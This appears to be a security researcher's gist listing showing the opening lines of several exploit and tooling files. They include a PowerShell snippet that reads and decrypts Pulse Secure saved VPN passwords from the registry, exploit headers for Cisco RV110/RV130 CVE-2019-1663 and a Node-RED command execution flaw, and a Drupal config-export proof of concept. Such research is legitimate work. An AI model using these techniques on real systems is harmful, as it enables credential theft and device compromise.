Quentin Kaiser qkaiser
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -AssemblyName System.Security; | |
| $ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
| foreach($ive in $ives) { | |
| $ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
| Write-Host "[+] Checking IVE $($ivename)..." | |
| $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
| # 3 possible value names for password | |
| $encrypted = $ive.Password1 | |
| if(!$encrypted){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Exploit for Cisco RV110 stack buffer overflow (CVE-2019-1663). | |
| --------------------------------------------------------------- | |
| It simply executes a ret2libc, calling system() with whatever's on the stack | |
| as argument. Offsets are for QEMU target. | |
| First MIPS-based exploit, might delete later. | |
| """ | |
| import requests |
qkaiser
/ CVE_2019_1663_RV130.py
Last active
March 22, 2019 21:22
PoC for Cisco RV130 stack-based buffer overflow (CVE-2019-1663).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Exploit for Cisco RV130 stack-based buffer overflow (CVE-2019-1663). | |
| This piece of code will get you proper 'return to zero protection', that is | |
| an executable stack (thanks, mprotect) and $pc pointing to the beginning of | |
| the stack. | |
| Enjoy your shells responsibly :) | |
| """ |
qkaiser
/ mmc_dump.py
Created
September 10, 2018 13:50
Dump MMC memory from Airmedia AM-100 or similar devices.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Dump MMC memory from Airmedia AM-100 or similar devices. | |
| # Dumping process steps | |
| * drop to u-boot shell | |
| * sanity check with printenv | |
| * load 512 bytes memory chunk from MMC to RAM at known safe address with "mmcread" | |
| * display 512 bytes of memory from RAM at known safe address with "md.b" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| ---------------------------------------------------------------------------- | |
| "THE BEER-WARE LICENSE" (Revision 42): | |
| QKaiser wrote this file. As long as you retain this notice you | |
| can do whatever you want with this stuff. If we meet some day, and you think | |
| this stuff is worth it, you can buy me a beer in return. | |
| ---------------------------------------------------------------------------- | |
| ---------------------------------------------------------------------------- | |
| Node-RED Remote Command Execution exploit. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| SDK_SHA512="02c6e8abbfa05072fbc139bc6c1d88245338631e7fa2776cbb2097ff1989fc6af595049a1bf7223dc0d39aa2bb1f31394cbadbcec45aa343d133f9f360675f99" | |
| SDK_DOWNLOAD_LINK="https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1" | |
| SDK_FILENAME="equinox-SDK-Oxygen.2.zip" | |
| echo "[+] Downloading SDK ..." | |
| wget -q $SDK_DOWNLOAD_LINK -O $SDK_FILENAME | |
| echo "[+] Checking checksums ..." | |
| echo "$SDK_SHA512 $SDK_FILENAME" | sha512sum -c - |
qkaiser
/ SA_CORE_2016_004.sh
Created
November 10, 2016 14:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # PoC for SA-CORE-2016-004 | |
| # Full config export can be downloaded without administrative permissions | |
| # | |
| # The idea is to grep for sensitive information within the exported | |
| # config files. Feel free to add your own findings :) | |
| # | |
| ############################################################################### |